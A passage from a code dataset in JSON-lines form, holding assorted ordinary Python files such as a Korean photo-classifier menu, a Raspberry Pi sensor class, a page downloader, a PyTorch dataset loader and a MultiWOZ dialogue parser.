second_sort_dict\r\n break\r\n else:\r\n print(\"올바른 형식의 입력이 아닙니다. 다시 입력하세요.\\n\")\r\n continue\r\n else:\r\n print(\"올바른 형식의 입력이 아닙니다. 다시 입력하세요.\\n\")\r\n continue\r\n\r\n\r\n\r\n#사용자 선택 중복검사\r\ndef check_duplicate(number_array):\r\n while True:\r\n number_array_check = list(OrderedDict.fromkeys(number_array))\r\n\r\n if number_array != number_array_check:\r\n print(\"중복된 입력입니다. 다시 입력하세요.\")\r\n return False\r\n continue\r\n\r\n elif number_array == number_array_check:\r\n return True\r\n break\r\n\r\n #한글,영어,숫자 기준 분류\r\ndef standard_filename():\r\n print(\"파일이름으로 분류합니다.\\n\")\r\n listK = [\"한글\", \"한\", \"kor\", \"korean\", \"Korean\", \"Kor\", \"KOREAN\", \"KOR\"]\r\n listE = [\"영어\", \"영\", \"eng\", \"english\", \"Eng\", \"English\", \"ENGLISH\", \"ENG\"]\r\n listN = [\"숫자\", \"num\", \"number\", \"Number\", \"Num\", \"NUM\", \"NUMBER\"]\r\n enter = \"\"\r\n while True:\r\n ken = input(\"한글/영어/숫자 中 1개를 선택하세요 : \")\r\n # 한글을 기준으로 선택했을 때\r\n if ken in listK:\r\n print(\"한글을 기준으로 파일을 분류합니다.\\n\")\r\n return ken\r\n\r\n # 알파벳을 기준으로 선택했을 때\r\n elif ken in listE:\r\n print(\"알파벳을 기준으로 파일을 분류합니다.\\n\")\r\n return ken\r\n\r\n # 숫자를 기준으로 선택했을 때\r\n elif ken in listN:\r\n print(\"숫자를 기준으로 파일을 분류합니다.\\n\")\r\n return ken\r\n\r\n # 아무 입력없이 ENTER만 받을 경우\r\n elif ken is enter:\r\n print(\"값을 입력해주세요\")\r\n\r\n # 리스트 이외의 값이나 2개 이상의 기준을 선택할 경우\r\n elif ken not in listK+listN+listE:\r\n print(\"유효한 값이 아닙니다. 혹은 2개 이상의 기준을 입력하셨습니다. 
다시 입력해주세요\")\r\n\r\n###############날짜 분류기준 완료###############\r\ndef date():\r\n print(\"날짜를 기준으로 분류합니다.\")\r\n listY = [\"년\", \"년도\", \"Y\", \"Year\", \"y\", \"year\", \"YEAR\"]\r\n listM = [\"월\", \"달\", \"M\", \"Month\", \"m\", \"MONTH\"]\r\n enter = \"\"\r\n\r\n while True:\r\n date_standard = input(\"년도 or 월 中 1개를 선택하세요 : \")\r\n # 년도를 기준으로 선택했을 때\r\n if date_standard in listY:\r\n print(\"년도를 기준으로 파일을 분류합니다.\\n\")\r\n return date_standard\r\n # 파일 분류 함수연결해야함\r\n # 월을 기준으로 선택했을 때\r\n elif date_standard in listM:\r\n print(\"월을 기준으로 파일을 분류합니다.\\n\")\r\n return date_standard\r\n # 파일 분류 함수연결해야함\r\n # 분류 기준을 선택하지 않은 상태로 엔터키를 바로 입력한 경우\r\n elif date_standard is enter:\r\n print(\"값을 입력해주세요\")\r\n\r\n # 리스트 이외의 다른 값 + 년도,월 기준을 모두 입력한 경우\r\n elif date_standard not in listY + listM:\r\n print(\"유효한 값이 아닙니다. 혹은 기준을 2개 입력하셨습니다. 다시 입력해주세요\")\r\n date_standard = '' #해야되는건지고려대상 초기화 문제\r\n\r\n\r\n\r\n#########추가 작업부분 완료##############\r\ndef furtheraction__check():\r\n\r\n listY = ['Y', 'y', 'Yes', 'yes', '네', '예', 'YES']\r\n listN = ['N', 'n', 'No', 'no', '아니오', '아니요', 'NO']\r\n enter =\"\"\r\n while True:\r\n furtheractionCheck = input(\"추가 작업을 진행하시겠습니까?(Y/N) : \")\r\n if furtheractionCheck in listY:\r\n print(\"추가 작업을 실행하겠습니다.\\n\")\r\n break\r\n elif furtheractionCheck in listN:\r\n print(\"프로그램을 종료하겠습니다.\")\r\n sys.exit()\r\n # 어떠한 값도 입력하지 않고 ENTER만 입력했을 때\r\n elif furtheractionCheck is enter:\r\n print(\"값을 입력해주세요\\n\")\r\n\r\n # 리스트안에 없는 다른 값 입력했을 때 & 중복값을 입력받았을 때\r\n elif furtheractionCheck not in listN + listY:\r\n print(\"'Y', 'y', 'Yes', 'yes', '네', '예', 'YES', 'N', 'n'\"\r\n \", 'No', 'no', '아니오', '아니요', 'NO' 중 1개의 값을 입력해 주세요\\n\")\r\n furtheractionCheck=''\r\n\r\ndef furtheraction__check():\r\n\r\n listY = ['Y', 'y', 'Yes', 'yes', '네', '예', 'YES']\r\n listN = ['N', 'n', 'No', 'no', '아니오', '아니요', 'NO']\r\n enter =\"\"\r\n while True:\r\n furtheractionCheck = input(\"추가 작업을 진행하시겠습니까?(Y/N) : \")\r\n if furtheractionCheck in listY:\r\n print(\"추가 작업을 실행하겠습니다.\\n\")\r\n break\r\n elif furtheractionCheck in listN:\r\n print(\"프로그램을 종료하겠습니다.\")\r\n sys.exit()\r\n # 어떠한 값도 입력하지 않고 ENTER만 입력했을 때\r\n elif furtheractionCheck is enter:\r\n print(\"값을 입력해주세요\\n\")\r\n\r\n # 리스트안에 없는 다른 값 입력했을 때 & 중복값을 입력받았을 때\r\n elif furtheractionCheck not in listN + listY:\r\n print(\"'Y', 'y', 'Yes', 'yes', '네', '예', 'YES', 'N', 'n'\"\r\n \", 'No', 'no', '아니오', '아니요', 'NO' 중 1개의 값을 입력해 주세요\\n\")\r\n furtheractionCheck=''\r\n\r\ndef main():\r\n print(\"########################################\")\r\n print(\"#### WELCOME TO PHOTO CLASSIFIER #####\")\r\n print(\"########################################\\n\")\r\n print(\"작업 폴더를 생성합니다.\")\r\n while True:\r\n fileName = start()\r\n photochecker(fileName)\r\n # okcheck()\r\n #root폴더로 다 끌어올리는 작업 부분\r\n fmr = fmrModule.FileMoverToRoot('C:/' + fileName)\r\n fmr.moveFilesToRoot()\r\n fmr.deleteFoldersInRoot()\r\n classifier_obj = FileClassifier('C:/' + fileName)\r\n number_array, second_sort_dict = numchecker()\r\n classifier_obj.mainClassifier(number_array, second_sort_dict)\r\n furtheraction__check()\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"MingiPark/Major_Basics_Project2","sub_path":"1st Implementation/mainModule.py","file_name":"mainModule.py","file_ext":"py","file_size_in_byte":13100,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1328274375","text":"import threading\nimport time\n\nimport Adafruit_DHT\nimport RPi.GPIO as GPIO\n\n\nDHT_TYPE = Adafruit_DHT.AM2302\nDHT_PIN 
= 18\nLED_PIN = 23\nSWITCH_PIN = 24\n\n\nclass PiThing(object):\n \"\"\"Internet 'thing' that can control GPIO on a Raspberry Pi.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the 'thing'.\"\"\"\n # Setup GPIO library.\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n # Setup LED as an output and switch as an input.\n GPIO.setup(LED_PIN, GPIO.OUT)\n GPIO.setup(SWITCH_PIN, GPIO.IN)\n # Create a lock to syncronize access to hardware from multiple threads.\n self._lock = threading.Lock()\n # Setup a thread to read the DHT sensor every 2 seconds and store\n # its last known value.\n self._humidity = None\n self._temperature = None\n self._dht_thread = threading.Thread(target=self._update_dht)\n self._dht_thread.daemon = True # Don't let this thread block exiting.\n self._dht_thread.start()\n\n def _update_dht(self):\n \"\"\"Main function for DHT update thread, will grab new temp & humidity\n values every two seconds.\n \"\"\"\n while True:\n with self._lock:\n # Read the humidity and temperature from the DHT sensor.\n self._humidity, self._temperature = Adafruit_DHT.read_retry(DHT_TYPE, DHT_PIN)\n # Wait 2 seconds then repeat.\n time.sleep(2.0)\n\n def get_humidity(self):\n \"\"\"Get the most recent humidity value (%).\"\"\"\n with self._lock:\n return self._humidity\n\n def get_temperature(self):\n \"\"\"Get the most recent temperature value (in degrees Celsius).\"\"\"\n with self._lock:\n return self._temperature\n\n def read_switch(self):\n \"\"\"Read the switch state and return its current value.\n \"\"\"\n with self._lock:\n return GPIO.input(SWITCH_PIN)\n\n def set_led(self, value):\n \"\"\"Set the LED to the provided value (True = on, False = off).\n \"\"\"\n with self._lock:\n GPIO.output(LED_PIN, value)\n","repo_name":"adafruit/Pi_Internet_Thing_Videos","sub_path":"Part_3/webapp/thing.py","file_name":"thing.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"34"} +{"seq_id":"6314783818","text":"import sys\nimport requests\n\n\ndef get_page(get_url):\n \"\"\"\n downloads the page specified with get_url string to index.html\n\n parameters:\n get_url: an url in the format of https://example.com/page1\n \"\"\"\n\n # get_url = \"https://plato.stanford.edu/cgi-bin/encyclopedia/random\"\n\n # header to authenticate myself as user\n headers = requests.utils.default_headers()\n\n headers.update(\n {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\",\n \"Referer\": \"https://www.google.com/\",\n }\n )\n\n page = requests.get(get_url, headers=headers)\n print(\"requested URL\")\n\n original_stdout = sys.stdout\n with open(\"newindex.html\", \"w\", encoding=\"utf-8\") as file:\n sys.stdout = file # Change the standard output to the file we created.\n print(page.text)\n sys.stdout = original_stdout\n print(\"updated index.html\")\n\n # print(page.text)\n\nget_page(\"https://plato.stanford.edu/cgi-bin/encyclopedia/random\")\n\n# common user agents\n# https://www.networkinghowtos.com/howto/common-user-agent-list/\n","repo_name":"mttias/get_article","sub_path":"getPage.py","file_name":"getPage.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14736105889","text":"N, M = map(int, input().split())\r\nx, y, d = map(int, input().split())\r\n\r\nvisited = [[0] * M for _ in range(N)]\r\n\r\ndx = [-1,0,1,0] \r\n# 북(0)쪽을 바라볼 
때 왼쪽의 x좌표값은 -1, 동(1)쪽을 바라볼 때 왼쪽의 x좌표값은 0...\r\ndy = [0,1,0,-1]\r\n# 북(0)쪽을 바라볼 때 왼쪽의 y좌표값은 0, 동(1)쪽을 바라볼 때 왼쪽의 y좌표값은 1...\r\n\r\nfield = [list(map(int, input().split())) for _ in range(N)]\r\n\r\nvisited[x][y] = 1\r\ncnt = 1\r\n\r\nwhile True:\r\n flag = 0\r\n for i in range(4):\r\n d = (d + 3) % 4\r\n # direction = 3 - direction 보다 명확한 식\r\n #왼쪽으로 한칸 돌리면 0,1,2,3 -> 3,2,1,0이 됨.\r\n nx = x + dx[d]\r\n ny = y + dy[d]\r\n\r\n if 0 <= nx < N and 0 <= ny < M and field[nx][ny] == 0:\r\n if visited[nx][ny] == 0:\r\n visited[nx][ny] = 1\r\n x = nx\r\n y = ny\r\n cnt += 1\r\n flag = 1\r\n break\r\n if flag == 0: # 사방이 청소 불가일 떄\r\n if field[x-dx[d]][y-dy[d]] == 1:\r\n print(cnt)\r\n break\r\n else:\r\n x = x-dx[d]\r\n y = y-dy[d]","repo_name":"LSC18/FOSCAR2023","sub_path":"백준/Gold/14503. 로봇 청소기/로봇 청소기.py","file_name":"로봇 청소기.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41634403033","text":"#!/usr/bin/env python\n\n# Reads a set of CSV files, with its respective brightfield or meiotic stage\n# coordinates and annotation, transforming them into linked CSV files\n\nfrom tqdm import tqdm\nfrom rtree import index\nfrom rtree.index import Rtree\nimport pandas as pd\nimport argparse\nimport os\nimport numpy as np\n\n\nNUM_TO_LABEL = {}\n\n\ndef link_particles_to_coordinates(part, coord, lp):\n part[args.feature] = \"_none_\"\n # Query particles against the index\n for index, row in part.iterrows():\n part.loc[index, args.feature] = \";\".join(list(map(NUM_TO_LABEL.get, coord.intersection(\n (float(row[lp[0]]), float(row[lp[2]]), float(row[lp[1]]), float(row[lp[3]]))\n ))))\n return part\n\n\ndef create_index(coord, lc):\n p = index.Property()\n idx = index.Index(properties=p)\n # Create the index for feature coordinates\n for i, row in coord.iterrows():\n NUM_TO_LABEL[i] = row[\"label\"]\n idx.add(i, [float(row[lc[0]]), float(row[lc[2]]), float(row[lc[1]]), float(row[lc[3]])])\n\n return idx\n\n\ndef filename_transform(path, old, new, coordir):\n dname = os.path.dirname(os.path.realpath(path))\n if len(coordir) != 0:\n dname = coordir\n fname = os.path.basename(os.path.realpath(path))\n\n for i, o in enumerate(old):\n fname = fname.replace(o, new[i])\n return dname + \"/\" + fname\n\n\ndef remove_extension(fname):\n new_fname = os.path.splitext(fname)[0]\n return new_fname\n\n\ndef open_file(filename):\n try:\n df = pd.read_csv(filename, header=0)\n return True, df\n except:\n return False, []\n\n\n# Argument parsing function\ndef cmdline_args():\n # Make parser object\n p = argparse.ArgumentParser(\n description=\"\"\"\n This program allows labeling of CSV files out from Tronos-ReadFile, \n labeled with respect to a coordinates file from a Tronos-ReadFile:Tracking\n pipeline. 
Model labels will be added as a column, as well as features derived from\n        the object position and size (XY, center, size), if applicable.\n        \"\"\",\n        formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n    )\n\n    p.add_argument(\"-s\", \"--source\", nargs=\"+\", help=\"Source *.[C|T]SV files to link\")\n    p.add_argument(\n        \"-o\",\n        \"--outdir\",\n        nargs=\"+\",\n        help=\"Destination directory for the new *_linked.[C|T]SV files\",\n    )\n    p.add_argument(\n        \"-i\",\n        \"--coordir\",\n        type=str,\n        help=\"Source coordinates directory for the *_coordinates.[C|T]SV files\",\n    )\n    p.add_argument(\"-d\", \"--namedel\", nargs=\"+\", help=\"Filename deletion key\")\n    p.add_argument(\"-a\", \"--nameadd\", nargs=\"+\", help=\"Filename addition key\")\n    p.add_argument(\n        \"-c\", \"--category\", help=\"Name for the analysis (example: wt_cell)\"\n    )\n    p.add_argument(\n        \"--feature\",\n        type=str,\n        help=\"Feature name, added as the column name\",\n        default=\"label\",\n    )\n    p.add_argument(\n        \"--clink\",\n        nargs=4,\n        help=\"Coordinate names for the R-tree; must be the area bounds\",\n        default = [\"x_1\", \"x_2\", \"y_1\", \"y_2\"]\n    )\n    p.add_argument(\n        \"--plink\",\n        nargs=4,\n        help=\"Particle coordinate names in same order as --clink; may be a centroid\",\n        default = [\"x\", \"x\", \"y\", \"y\"]\n    )\n    p.add_argument(\"--first\", action=\"store_true\", help=\"Save destination coordinates from single-first frame\")\n    p.add_argument(\n        \"--sortby\", type=str, help=\"Enable sorting of the final table\", default=None\n    )\n    return p.parse_args()\n\n\nif __name__ == \"__main__\":\n    args = cmdline_args()\n    for filename in tqdm(args.source):\n        correct, df_partic = open_file(filename)\n        if not correct:\n            print(\"[ERROR] Could not open {}\".format(filename))\n            continue\n        df_partic[\"category\"] = args.category\n        df_partic.drop_duplicates(subset=None, keep=\"first\", inplace=False)\n        correct, df_coords = open_file(\n            filename_transform(filename, args.namedel, args.nameadd, args.coordir)\n        )\n        if not correct:\n            print(\"[ERROR] Could not find coordinate file for {}\".format(filename))\n            continue\n\n        df_partic_time = df_partic.sort_values(by=[\"frame\"], kind=\"mergesort\")\n        result = pd.DataFrame()\n\n        for t in df_partic_time[\"frame\"].unique():\n            NUM_TO_LABEL = {}\n            df_coords_time = df_coords[df_coords.loc[:][\"frame\"] == (t - 1)]\n            coords = create_index(df_coords_time, args.clink)\n            if args.first:\n                df_partic_coords = link_particles_to_coordinates(df_partic_time, coords, args.plink)\n                result = result.append(df_partic_coords)\n                break\n            df_partic_coords = link_particles_to_coordinates(df_partic_time[df_partic_time.loc[:][\"frame\"] == t], coords, args.plink)\n            result = result.append(df_partic_coords)\n\n        if args.sortby is not None:\n            try:\n                result = result.sort_values(by=[args.sortby], kind=\"mergesort\")\n            except Exception:\n                print(\n                    \"ERROR: Could not sort the dataframe by the specified column {}\".format(\n                        args.sortby\n                    )\n                )\n\n        result.to_csv(\n            remove_extension(filename_transform(filename, [], [], args.outdir[0]))\n            + \"_linked.csv\",\n            header=True,\n            index=False,\n        )\n        pass","repo_name":"danilexn/tronos","sub_path":"tronos/track-labeling.py","file_name":"track-labeling.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
{"seq_id":"25885155212","text":"import tkinter as tk\n\nclass InventoryWindow:\n    def __init__(self):\n        self.root = tk.Toplevel()\n        self.root.title(\"Inventory\")\n        \n        # Weapons\n        self.weapon_labels = []\n        
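# populated by add_weapon(): three tk.Label widgets (name, damage, price) per weapon here, and one Use button per weapon below\n        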
self.weapon_buttons = []\n \n self.weapon_frame = tk.Frame(self.root)\n self.weapon_frame.pack()\n \n # Add weapons to the inventory\n self.add_weapon(\"Weapon 1\", 10, 50)\n self.add_weapon(\"Weapon 2\", 20, 100)\n # Add more weapons...\n \n # Keys\n self.key_labels = []\n self.key_buttons = []\n \n self.key_frame = tk.Frame(self.root)\n self.key_frame.pack()\n \n # Add keys to the inventory\n self.add_key(0, 200)\n self.add_key(1, 300)\n # Add more keys...\n \n # Armors\n self.armor_labels = []\n self.armor_buttons = []\n \n self.armor_frame = tk.Frame(self.root)\n self.armor_frame.pack()\n \n # Add armors to the inventory\n self.add_armor(1, 200)\n self.add_armor(2, 400)\n # Add more armors...\n \n # Healing Pads\n self.healing_pad_labels = []\n self.healing_pad_buttons = []\n \n self.healing_pad_frame = tk.Frame(self.root)\n self.healing_pad_frame.pack()\n \n # Add healing pads to the inventory\n self.add_healing_pad(100)\n self.add_healing_pad(150)\n # Add more healing pads...\n \n # Close Button\n self.close_button = tk.Button(self.root, text=\"Close Inventory\", command=self.close_inventory)\n self.close_button.pack()\n \n def add_weapon(self, name, damage, price):\n weapon_label = tk.Label(self.weapon_frame, text=name)\n weapon_label.pack(side=tk.LEFT)\n self.weapon_labels.append(weapon_label)\n \n damage_label = tk.Label(self.weapon_frame, text=f\"Damage: {damage}\")\n damage_label.pack(side=tk.LEFT)\n self.weapon_labels.append(damage_label)\n \n price_label = tk.Label(self.weapon_frame, text=f\"Price: {price}\")\n price_label.pack(side=tk.LEFT)\n self.weapon_labels.append(price_label)\n \n use_button = tk.Button(self.weapon_frame, text=\"Use\", command=lambda: self.use_weapon(name))\n use_button.pack(side=tk.LEFT)\n self.weapon_buttons.append(use_button)\n \n def add_key(self, code, price):\n key_label = tk.Label(self.key_frame, text=f\"Code: {code}\")\n key_label.pack(side=tk.LEFT)\n self.key_labels.append(key_label)\n \n price_label = tk.Label(self.key_frame, text=f\"Price: {price}\")\n price_label.pack(side=tk.LEFT)\n self.key_labels.append(price_label)\n \n use_button = tk.Button(self.key_frame, text=\"Use\", command=lambda: self.use_key(code))\n use_button.pack(side=tk.LEFT)\n self.key_buttons.append(use_button)\n \n def add_armor(self, durability, price):\n armor_label = tk.Label(self.armor_frame, text=f\"Durability: {durability}\")\n armor_label.pack(side=tk.LEFT)\n self.armor_labels.append(armor_label)\n \n price_label = tk.Label(self.armor_frame, text=f\"Price: {price}\")\n price_label.pack(side=tk.LEFT)\n self.armor_labels.append(price_label)\n \n use_button = tk.Button(self.armor_frame, text=\"Use\", command=lambda: self.use_armor(durability))\n use_button.pack(side=tk.LEFT)\n self.armor_buttons.append(use_button)\n \n def add_healing_pad(self, price):\n healing_pad_label = tk.Label(self.healing_pad_frame, text=f\"Price: {price}\")\n healing_pad_label.pack(side=tk.LEFT)\n self.healing_pad_labels.append(healing_pad_label)\n \n use_button = tk.Button(self.healing_pad_frame, text=\"Use\", command=self.use_healing_pad)\n use_button.pack(side=tk.LEFT)\n self.healing_pad_buttons.append(use_button)\n \n def use_weapon(self, name):\n # Implement the logic to use the selected weapon\n pass\n \n def use_key(self, code):\n # Implement the logic to use the selected key\n pass\n \n def use_armor(self, durability):\n # Implement the logic to use the selected armor\n pass\n \n def use_healing_pad(self):\n # Implement the logic to use the healing pad\n pass\n \n def 
close_inventory(self):\n self.root.destroy()\n\n# Create an instance of the InventoryWindow class\ninventory_window = InventoryWindow()\n","repo_name":"nourelattug/Noureslam","sub_path":"inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33609527869","text":"#coding=utf-8\nimport os\nimport shutil\nimport traceback\n\nfrom numpy import arange\n \n \ndef move_file(src_path, dst_path, file):\n print(file)\n print ('from : ',src_path)\n print ('to : ',dst_path)\n try:\n # cmd = 'chmod -R +x ' + src_path\n # os.popen(cmd)\n f_src = os.path.join(src_path, file)\n if not os.path.exists(dst_path):\n os.mkdir(dst_path)\n f_dst = os.path.join(dst_path, file)\n shutil.move(f_src, f_dst)\n except Exception as e:\n print ('move_file ERROR: ',e)\n traceback.print_exc()\n\ndef mkdir(path):\n\tfolder = os.path.exists(path)\n\tif not folder: #判断是否存在文件夹如果不存在则创建为文件夹\n\t\tos.makedirs(path) #makedirs 创建文件时如果路径不存在会创建这个路径\n\t\tprint (\"--- new folder... ---\")\n\t\tprint (\"--- OK ---\")\n\telse:\n\t\tprint (\"--- There is this folder! ---\")\n\t\t\n\npath = \"/home/bo/桌面/LSVT/train_32/\"\ndatanames = os.listdir(path)\nlist = []\nfor i in datanames:\n list.append(i)\n# print(list)\n\ndest_path = \"/home/bo/桌面/LSVT/train/\"\n\nindex = 0\ni = 0\nnew_file = \"\"\nfor img in list:\n\n if index % 100 == 0:\n\n new_file = dest_path + str(i)\n mkdir(new_file)\n i=i+1\n\n move_file(path,new_file,img)\n\n index = index + 1\n","repo_name":"luckpoy/PaperCode","sub_path":"data_trans/unamed_datasets_split_pic.py","file_name":"unamed_datasets_split_pic.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25128657313","text":"from rich import print as r\r\nimport logging\r\nlogging.basicConfig(filename='employee.log',level=logging.INFO,\r\n format='%(asctime)s:%(levelname)s:%(message)s')\r\n\r\n\r\n\r\nclass Employee:\r\n def __init__(self,first,last):\r\n self.first=first\r\n self.last=last\r\n self.val=0\r\n\r\n logging.info('created employee: {}-{}'.format(self.first,self.last))\r\n\r\n @property\r\n def email(self):\r\n return '{}.{}@email.com'.format(self.first, self.last)\r\n\r\n @property\r\n def fname(self):\r\n return '{} {}'.format(self.first,self.last)\r\n\r\nemp_1=Employee('John','Smitch')\r\nemp2=Employee('Corey','Schafer')\r\nemp3=Employee('jane','doo')\r\n\r\nr(100)","repo_name":"Pritish-2001/ContextManager-and-rich.","sub_path":"cb.py","file_name":"cb.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28957794299","text":"from tqdm.auto import tqdm\nfrom torch.utils.data import Dataset\nfrom os.path import exists\nimport pandas as pd\nimport numpy as np\nfrom torchvision.datasets.folder import default_loader\nimport torch\n\nclass Dataset(Dataset):\n def __init__(self, label_path, transform=None, transform_flag=True):\n self._image_paths = []\n self._labels = []\n self.indices = []\n self._label_names = {}\n self.transform = transform\n self.transform_flag = transform_flag\n\n # Reading the dataframe\n df = pd.DataFrame()\n for path in label_path:\n df_ = pd.read_csv(path)\n df = df.append(df_)\n\n #df['labels'] = df['labels'].apply(self.group_labels)\n df = df.fillna(' ')\n df = df[df['labels']!=' ']\n self._image_paths = df['paths'].to_list()\n self._labels = 
df['labels'].to_list()\n for i,labels in enumerate(list(set(self._labels))):\n self._label_names['label'+str(i)]=labels\n\n def __len__(self):\n return len(self._image_paths)\n\n def __getitem__(self, idx):\n img = default_loader(self._image_paths[idx])\n if self.transform is not None and self.transform_flag:\n img = self.transform(img)\n \n labels = np.array(self._labels[idx]).astype(np.float32)\n self.indices.append(idx)\n \n return img, labels\n \n def get_mean_std(self):\n images = []\n for img, label in self:\n img = np.array(img)\n images.append(img)\n images = np.array(images)\n print(images.shape)\n mean = images.mean(axis=(0,2,3))\n std = images.std(axis=(0,2,3))\n\n return mean, std\n\n def get_class_weights(self):\n class_count = self.get_class_distribution()\n class_freq = class_count / np.sum(class_count)\n\n class_weights = 1.0 / class_freq\n norm_weights = class_weights / np.sum(class_weights)\n\n return norm_weights\n\n def get_class_distribution(self):\n return np.bincount(self._labels)\n\n def get_labels(self):\n labels = np.array(self._labels).astype(np.float32)\n \n return labels\n \n def group_labels(self, n):\n try:\n n = float(n)\n if n<1:\n return 0\n else:\n return 1\n except:\n return ' '","repo_name":"nspunn1993/SkeletonCodes","sub_path":"pytorch_classification/data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"5911690056","text":"def solution(operations):\n answer = []\n\n for op in operations:\n cmd, val = op.split()\n\n if cmd == 'I':\n answer.append(int(val))\n elif cmd == 'D' and len(answer) != 0:\n if val == '1':\n answer.remove(max(answer))\n else:\n answer.remove(min(answer))\n\n if len(answer) == 0:\n answer = [0]\n\n return [max(answer), min(answer)]\n\n\nprint(solution([\"I 16\", \"D 1\"]))\nprint(solution([\"I 7\", \"I 5\", \"I -5\", \"D -1\"]))\n","repo_name":"vumbumy/programmers","sub_path":"42628.py","file_name":"42628.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43005958803","text":"# -*- coding: utf8 -*-\nimport os\nimport json\n# from termcolor import colored\nimport random\nimport re\n\n\n\nclass MultiWOZParser:\n\n def __init__(self, directory=\"\"):\n \"\"\"\n Downloads the MultiWOZ-2 data set and stores all the interesting file names.\n This does not load the data into RAM.\n :param directory:\n \"\"\"\n self.directory = directory\n\n self.data_file_name = os.path.abspath(\n os.path.join(directory, \"data.json\")\n )\n self.ontology_file_name = os.path.abspath(\n os.path.join(directory, \"ontology.json\")\n )\n self.acts_file_name = os.path.abspath(\n os.path.join(directory, \"dialogue_acts.json\")\n )\n self.testlist_file_name = os.path.abspath(\n os.path.join(directory, \"testListFile.json\")\n )\n self.vallist_file_name = os.path.abspath(\n os.path.join(directory, \"valListFile.json\")\n )\n\n assert os.path.exists(self.data_file_name)\n assert os.path.exists(self.acts_file_name)\n assert os.path.exists(self.testlist_file_name)\n assert os.path.exists(self.vallist_file_name)\n\n self._data = None\n self._ontology = None\n self._names = None\n self._acts = None\n self._test_list = None\n self._validation_list = None\n self._domain_substitute = None\n\n\n @property\n def data(self):\n # Load data on demand\n if self._data is None:\n with open(self.data_file_name, \"r\") as read_file:\n 
self._data = json.load(read_file)\n\n # Return the data\n return self._data\n\n @property\n def ontology(self):\n # Load data on demand\n if self._ontology is None:\n with open(self.ontology_file_name, \"r\") as read_file:\n self._ontology = json.load(read_file)\n\n # Return the data\n return self._ontology\n\n @property\n def story_names(self):\n if self._names is None:\n self._names = list(self.data)\n return self._names\n\n @property\n def acts(self):\n # Load data on demand\n if self._acts is None:\n with open(self.acts_file_name, \"r\") as read_file:\n self._acts = json.load(read_file)\n\n # Return the data\n return self._acts\n\n @property\n def validation_list(self):\n # Load data on demand\n if self._validation_list is None:\n with open(self.vallist_file_name, \"r\") as read_file:\n self._validation_list = read_file.read().split()\n\n # Return the data\n return self._validation_list\n\n @property\n def test_list(self):\n # Load data on demand\n if self._test_list is None:\n with open(self.testlist_file_name, \"r\") as read_file:\n self._test_list = read_file.read().split()\n\n # Return the data\n return self._test_list\n\n def split_punctuation(self, sentence):\n s1 = ' '.join(re.sub(r'([\\w])([,.!?])([^\\w])', r'\\1 \\2 \\3 ', sentence).split())\n # process the end of line\n return ' '.join(re.sub(r'([\\w])([,.!?])$', r'\\1 \\2 ', s1).split())\n\n def get_action_sentences(self):\n val_domain_list = ['attraction', 'restaurant', 'hotel', 'taxi']\n domain_action_sents = {} #{'attraction': {}, 'restaurant': {}, 'hotel': {}, 'taxi': {}}\n for name, dialog in self.data.items():\n log = dialog['log']\n num_turns = len(log)\n\n name = name[:-5]\n\n # story = f'## story_{name}' + '\\n'\n # print(colored(f'## story_{name}', 'green'))\n\n count_usr = 0 # How often the user spoke\n count_wiz = 0 # How often the wizard replied (consecutive actions count as one)\n\n for step in log:\n text = step['text']\n text = self.split_punctuation(text)\n if len(step['metadata']) == 0:\n # user turn\n count_usr += 1\n else:\n # wizard turn\n count_wiz += 1\n\n # parse wizard action\n if str(count_wiz) in self.acts[name]:\n action_list = self.acts[name][str(count_wiz)]\n\n if type(action_list) is not dict:\n if type(action_list) is str and action_list == \"No Annotation\":\n\n continue\n for base_action, slot_list in action_list.items():\n if '-' in base_action:\n domain, action_name = base_action.split('-')\n domain, action_name = domain.lower(), action_name.lower()\n else:\n continue\n if domain not in domain_action_sents:\n domain_action_sents[domain] = {}\n for slot in slot_list:\n slot_name = slot[0].lower()\n intent = action_name + '_' + slot_name\n if intent not in domain_action_sents[domain]:\n domain_action_sents[domain][intent] = set()\n\n domain_action_sents[domain][intent].add(text)\n\n output_dir = '../../MULTIWOZ2.1'\n fil_domain = {}\n for d in val_domain_list:\n if d in domain_action_sents:\n # print(d, domain_action_sents[d].keys())\n fil_domain[d] = list(sorted(domain_action_sents[d].keys()))\n # print(fil_domain[d].keys())\n # with open(os.path.join(output_dir, 'multiwoz_domain_intent_sents.json'), 'w', encoding='utf8') as fd:\n # json.dump(fil_domain, fd)\n print(fil_domain)\n\n # bahasa intent\n bahasa_dir = '../../BahasaWOZ/MULTIWOZ_BAHASA/annotations/formatted_data/bahasa'\n bahasa_domain_intent = {}\n for d in val_domain_list:\n intent_list = []\n with open(os.path.join(bahasa_dir, d, 'vocab.intent'), 'r', encoding='utf8') as fd:\n for l in fd:\n l = l.strip()\n if l != '':\n 
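# A minimal sketch of the lazy, load-once property pattern MultiWOZParser uses
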